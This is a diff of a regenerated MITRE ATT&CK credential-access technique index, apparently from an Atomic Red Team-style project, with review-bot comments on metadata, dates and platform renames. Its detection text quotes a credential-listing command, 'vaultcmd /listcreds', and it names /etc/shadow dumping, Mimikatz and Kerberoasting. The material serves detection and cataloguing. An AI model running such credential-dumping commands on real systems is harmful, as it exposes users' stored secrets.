+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
+ created: '2020-02-11T18:46:56.263Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1003/008
+ external_id: T1003.008
+ - source_name: Linux Password and Shadow File Formats
+ description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
+ File Formats. Retrieved February 19, 2020.
+ url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
+ - source_name: nixCraft - John the Ripper
+ description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
+ unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
+ 2020.'
+ url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1003.008
atomic_tests: []
T1558.002:
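Review bot: the context lines in the T1003.008 description and detection text carry hard line breaks around the file names (`Adversaries may attempt to dump the contents of /etc/passwd` / `and /etc/shadow` / `, alerting on the pid,`), leaving a dangling comma at the start of a line. These survive the regeneration unchanged, so the step that strips inline markup from the upstream text is emitting a newline where a space is wanted. Fix it in the generator rather than by hand, since the same pattern shows up in other techniques in this patch (`vaultcmd.exe`, `OpenProcess`).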
@@ -52975,7 +53707,7 @@ credential-access:
from Memory. Retrieved October 11, 2019.
url: https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea
source_name: Medium Detecting Attempts to Steal Passwords from Memory
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T21:46:46.831Z'
name: 'Steal or Forge Kerberos Tickets: Silver Ticket'
description: |-
Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)
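Review bot: `modified` for Silver Ticket (T1558.002) also goes backwards, from `'2021-04-29T14:49:39.188Z'` to `'2020-03-25T21:46:46.831Z'`, more than a year earlier, with no content change visible in the hunk. Confirm this is the upstream object's value and not a stale bundle feeding the regeneration, and list the intentional date regressions in the commit message.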
@@ -53001,13 +53733,11 @@ credential-access:
- 'Logon Session: Logon Session Metadata'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1558.002
atomic_tests: []
T1555.004:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-15T16:44:35.906Z'
name: 'Credentials from Password Stores: Windows Credential Manager'
description: |-
Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)
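Review bot: for T1558.002 the `-` lines drop both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` without re-adding an `x_mitre_attack_spec_version`, whereas every other object in the patch either ends up at `3.2.0` or keeps its old value; after this change the Silver Ticket object has no attack-spec version at all. The same object keeps `x_mitre_permissions_required:` / `- User`, while that field is removed from T1056, T1003.008, T1556.001, T1556.005 and T1003.006 elsewhere in the patch. If the field is being retired, retire it uniformly; if this object came from an older upstream revision, that is worth knowing before merge.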
@@ -53024,24 +53754,24 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Bernaldo Penas Antelo
+ - Mugdha Peter Bansode
+ - Uriel Kosayev
+ - Vadim Khrykov
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor process and command-line parameters of vaultcmd.exe
for suspicious activity, such as listing credentials from the Windows Credentials locker (i.e., vaultcmd /listcreds:“Windows Credentials”
).(Citation: Malwarebytes The Windows Vault)
Consider monitoring API calls such as CredEnumerateA
that may list credentials from the Windows Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
Consider monitoring file reads to Vault locations, %Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\
, for suspicious activity.(Citation: Malwarebytes The Windows Vault)
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
x_mitre_version: '1.1'
- x_mitre_contributors:
- - Bernaldo Penas Antelo
- - Mugdha Peter Bansode
- - Uriel Kosayev
- - Vadim Khrykov
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
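Review bot: the T1555.004 detection text (context lines) contains typographic quotes in the example command, `vaultcmd /listcreds:“Windows Credentials”`, and breaks the line between `vaultcmd.exe` and `for suspicious activity`. Anyone copying that string into a command-line match rule will be matching the curly quotes and will miss real `vaultcmd /listcreds:"Windows Credentials"` invocations; normalizing quotes to ASCII when importing the upstream text would avoid that. The block moves of `x_mitre_contributors` and `x_mitre_platforms` are pure reorders with the same four contributors and the same single platform, so nothing is lost in this hunk.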
@@ -53082,36 +53812,13 @@ credential-access:
url: https://www.passcape.com/windows_password_recovery_vault_explorer
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1555.004
atomic_tests: []
T1556.001:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
- type: attack-pattern
- created: '2020-02-11T19:05:02.399Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.001
- url: https://attack.mitre.org/techniques/T1556/001
- - source_name: Dell Skeleton
- description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
- Retrieved April 8, 2019.
- url: https://www.secureworks.com/research/skeleton-key-malware-analysis
- - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
- description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
- June 3, 2016.
- source_name: TechNet Audit Policy
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T15:26:54.386Z'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
@@ -53132,6 +53839,7 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for calls to OpenProcess
that can be
used to manipulate lsass.exe running on a domain controller as well as for
malicious modifications to functions exported from authentication-related
@@ -53146,52 +53854,42 @@ credential-access:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g. a user has an active login
session but has not entered the building or does not have VPN access). "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Process: Process Access'
- 'File: File Modification'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1556.005:
- technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
type: attack-pattern
- created: '2022-01-13T20:02:28.349Z'
+ id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ created: '2020-02-11T19:05:02.399Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1556.005
- url: https://attack.mitre.org/techniques/T1556/005
- - source_name: store_pwd_rev_enc
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
- description: Microsoft. (2021, October 28). Store passwords using reversible
- encryption. Retrieved January 3, 2022.
- - source_name: how_pwd_rev_enc_1
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
- description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
- encryption: how it works (part 1). Retrieved November 17, 2021.'
- - source_name: how_pwd_rev_enc_2
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
- description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
- encryption: how it works (part 2). Retrieved November 17, 2021.'
- - source_name: dump_pwd_dcsync
- url: https://adsecurity.org/?p=2053
- description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
- All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1556/001
+ external_id: T1556.001
+ - source_name: Dell Skeleton
+ description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+ Retrieved April 8, 2019.
+ url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+ - source_name: TechNet Audit Policy
+ description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+ June 3, 2016.
+ url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1556.005:
+ technique:
+ modified: '2024-08-26T15:40:31.871Z'
name: Reversible Encryption
description: |-
An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption
property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
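Review bot: this hunk is not auditable by eye because the diff aligns T1556.001's trailing keys against T1556.005's old header, so the `-` block from `- T1556.005:` through `- modified: '2022-05-11T14:00:00.188Z'` deletes T1556.005's identifiers and all five of its `external_references` in one go. They reappear in a later hunk (`mitre-attack`, `dump_pwd_dcsync`, `store_pwd_rev_enc`, `how_pwd_rev_enc_1`, `how_pwd_rev_enc_2`), so the object is intact, but for regeneration commits of this kind please review with a patience or histogram diff, or split the regeneration into per-technique commits, so that moves and deletions can be told apart.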
@@ -53213,6 +53911,7 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor property changes in Group Policy: Computer
Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
Policy\\Store passwords using reversible encryption
. By default, the
@@ -53223,23 +53922,50 @@ credential-access:
Directory PowerShell modules, such as Set-ADUser
and Set-ADAccountControl
,
that change account configurations. \n\nMonitor Fine-Grained Password Policies
and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Command: Command Execution'
- 'User Account: User Account Metadata'
- 'Script: Script Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+ created: '2022-01-13T20:02:28.349Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/005
+ external_id: T1556.005
+ - source_name: dump_pwd_dcsync
+ description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+ All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+ url: https://adsecurity.org/?p=2053
+ - source_name: store_pwd_rev_enc
+ description: Microsoft. (2021, October 28). Store passwords using reversible
+ encryption. Retrieved January 3, 2022.
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+ - source_name: how_pwd_rev_enc_1
+ description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+ encryption: how it works (part 1). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+ - source_name: how_pwd_rev_enc_2
+ description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+ encryption: how it works (part 2). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1111:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:37:20.612Z'
name: Multi-Factor Authentication Interception
description: "Adversaries may target multi-factor authentication (MFA) mechanisms,
(i.e., smart cards, token generators, etc.) to gain access to credentials
@@ -53310,9 +54036,8 @@ credential-access:
url: https://sec.okta.com/scatterswine
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1003.003:
technique:
@@ -53371,12 +54096,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.003
atomic_tests: []
T1558.003:
technique:
- modified: '2023-03-30T21:01:46.538Z'
+ modified: '2024-09-23T22:20:10.994Z'
name: 'Steal or Forge Kerberos Tickets: Kerberoasting'
description: "Adversaries may abuse a valid Kerberos ticket-granting ticket
(TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket
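Review bot: T1003.003 only loses `spec_version: '2.1'` in this hunk and stays at `x_mitre_attack_spec_version: 3.1.0` with no `modified` bump, while the neighbouring objects (T1187, T1056, T1111, T1558.003) are raised to `3.2.0` and gain `revoked`/`x_mitre_deprecated` keys. If the source bundle is uniformly at spec 3.2.0 this looks like a partially regenerated object; confirm that upstream still lists T1003.003 at 3.1.0, otherwise regenerate it.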
@@ -53408,6 +54132,7 @@ credential-access:
phase_name: credential-access
x_mitre_contributors:
- Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
TGS service ticket requests. Particularly investigate irregular patterns of
activity (ex: accounts making numerous requests, Event ID 4769, within a small
@@ -53417,7 +54142,6 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
@@ -53429,111 +54153,49 @@ credential-access:
id: attack-pattern--f2877f7f-9a4c-4251-879f-1224e3006bee
created: '2020-02-11T18:43:38.588Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1558/003
external_id: T1558.003
+ - source_name: Microsoft Detecting Kerberoasting Feb 2018
+ description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+ using Azure Security Center. Retrieved March 23, 2018.
+ url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- source_name: Empire InvokeKerberoast Oct 2016
description: EmpireProject. (2016, October 31). Invoke-Kerberoast.ps1. Retrieved
March 22, 2018.
url: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
+ - source_name: SANS Attacking Kerberos Nov 2014
+ description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+ Guard Dog of Hades. Retrieved March 22, 2018.
+ url: https://redsiege.com/kerberoast-slides
- source_name: AdSecurity Cracking Kerberos Dec 2015
description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
Domain. Retrieved March 22, 2018.
url: https://adsecurity.org/?p=2293
- - source_name: Microsoft Detecting Kerberoasting Feb 2018
- description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
- using Azure Security Center. Retrieved March 23, 2018.
- url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- - source_name: Microsoft SPN
- description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
- 2018.
- url: https://msdn.microsoft.com/library/ms677949.aspx
- source_name: Microsoft SetSPN
description: Microsoft. (2010, April 13). Service Principal Names (SPNs) SetSPN
Syntax (Setspn.exe). Retrieved March 22, 2018.
url: https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx
- - source_name: SANS Attacking Kerberos Nov 2014
- description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
- Guard Dog of Hades. Retrieved March 22, 2018.
- url: https://redsiege.com/kerberoast-slides
+ - source_name: Microsoft SPN
+ description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
+ 2018.
+ url: https://msdn.microsoft.com/library/ms677949.aspx
- source_name: Harmj0y Kerberoast Nov 2016
description: Schroeder, W. (2016, November 1). Kerberoasting Without Mimikatz.
- Retrieved March 23, 2018.
- url: https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/
+ Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/powershell/kerberoasting-without-mimikatz/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1558.003
atomic_tests: []
T1003.006:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - ExtraHop
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
- type: attack-pattern
- created: '2020-02-11T18:45:34.293Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1003.006
- url: https://attack.mitre.org/techniques/T1003/006
- - url: https://msdn.microsoft.com/library/cc228086.aspx
- description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
- Service (DRS) Remote Protocol. Retrieved December 4, 2017.
- source_name: Microsoft DRSR Dec 2017
- - url: https://msdn.microsoft.com/library/dd207691.aspx
- description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
- 4, 2017.
- source_name: Microsoft GetNCCChanges
- - url: https://wiki.samba.org/index.php/DRSUAPI
- description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
- source_name: Samba DRSUAPI
- - url: https://source.winehq.org/WineAPI/samlib.html
- description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
- source_name: Wine API samlib.dll
- - url: https://adsecurity.org/?p=1729
- description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
- and Detection. Retrieved August 7, 2017.
- source_name: ADSecurity Mimikatz DCSync
- - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
- description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
- Oh My. Retrieved August 7, 2017.
- source_name: Harmj0y Mimikatz and DCSync
- - url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
- description: Warren, J. (2017, July 11). Manipulating User Passwords with
- Mimikatz. Retrieved December 4, 2017.
- source_name: InsiderThreat ChangeNTLM July 2017
- - url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
- description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
- August 7, 2017.
- source_name: GitHub Mimikatz lsadump Module
- - url: https://msdn.microsoft.com/library/cc237008.aspx
- description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
- Retrieved December 6, 2017.
- source_name: Microsoft NRPC Dec 2017
- - url: https://msdn.microsoft.com/library/cc245496.aspx
- description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
- Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
- source_name: Microsoft SAMR
- - url: https://adsecurity.org/?p=1729
- description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
- and Detection. Retrieved December 4, 2017.
- source_name: AdSecurity DCSync Sept 2015
- - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
- description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
- Oh My. Retrieved December 4, 2017.
- source_name: Harmj0y DCSync Sept 2015
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:54:08.312Z'
name: 'OS Credential Dumping: DCSync'
description: |-
Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
@@ -53544,26 +54206,88 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - ExtraHop
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Also monitor for network protocols(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests(Citation: Microsoft SAMR) from IPs not associated with known domain controllers.(Citation: AdSecurity DCSync Sept 2015)
Note: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Access'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
+ created: '2020-02-11T18:45:34.293Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1003/006
+ external_id: T1003.006
+ - source_name: GitHub Mimikatz lsadump Module
+ description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
+ August 7, 2017.
+ url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
+ - source_name: ADSecurity Mimikatz DCSync
+ description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+ and Detection. Retrieved August 7, 2017.
+ url: https://adsecurity.org/?p=1729
+ - source_name: AdSecurity DCSync Sept 2015
+ description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+ and Detection. Retrieved December 4, 2017.
+ url: https://adsecurity.org/?p=1729
+ - source_name: Microsoft DRSR Dec 2017
+ description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
+ Service (DRS) Remote Protocol. Retrieved December 4, 2017.
+ url: https://msdn.microsoft.com/library/cc228086.aspx
+ - source_name: Microsoft NRPC Dec 2017
+ description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
+ Retrieved December 6, 2017.
+ url: https://msdn.microsoft.com/library/cc237008.aspx
+ - source_name: Microsoft GetNCCChanges
+ description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
+ 4, 2017.
+ url: https://msdn.microsoft.com/library/dd207691.aspx
+ - source_name: Microsoft SAMR
+ description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
+ Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
+ url: https://msdn.microsoft.com/library/cc245496.aspx
+ - source_name: Samba DRSUAPI
+ description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
+ url: https://wiki.samba.org/index.php/DRSUAPI
+ - source_name: Harmj0y DCSync Sept 2015
+ description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+ Oh My. Retrieved December 4, 2017.
+ url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+ - source_name: Harmj0y Mimikatz and DCSync
+ description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+ Oh My. Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+ - source_name: InsiderThreat ChangeNTLM July 2017
+ description: Warren, J. (2017, July 11). Manipulating User Passwords with
+ Mimikatz. Retrieved December 4, 2017.
+ url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
+ - source_name: Wine API samlib.dll
+ description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
+ url: https://source.winehq.org/WineAPI/samlib.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1003.006
atomic_tests: []
T1556:
technique:
- modified: '2024-04-11T21:51:44.851Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Modify Authentication Process
description: |-
Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
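Review bot: the added external_references for T1003.006 contain two pairs that differ only in retrieval date: `ADSecurity Mimikatz DCSync` and `AdSecurity DCSync Sept 2015` both point at https://adsecurity.org/?p=1729, and `Harmj0y DCSync Sept 2015` / `Harmj0y Mimikatz and DCSync` cite the same post on two hostnames. Both source_name keys have to survive if the technique description cites each of them, so do not dedupe by hand; instead confirm the upstream ATT&CK object really carries both entries, and leave a comment in the generator if this file is produced automatically so nobody "fixes" it later.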
@@ -53576,6 +54300,7 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Chris Ross @xorrior
x_mitre_deprecated: false
@@ -53612,17 +54337,17 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- Network
- - Azure AD
- - Google Workspace
- IaaS
- - Office 365
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Process: Process Access'
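Review bot: the platform list for T1556 drops `Azure AD`, `Google Workspace` and `Office 365` in favour of `Office Suite` and `Identity Provider` (with the version bump 2.4 to 2.5). Any index, filter or CSV that keys on the old platform names will silently stop matching this technique, so the per-platform index files should be regenerated in the same change and the PR description should call out the rename.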
@@ -53668,81 +54393,10 @@ credential-access:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
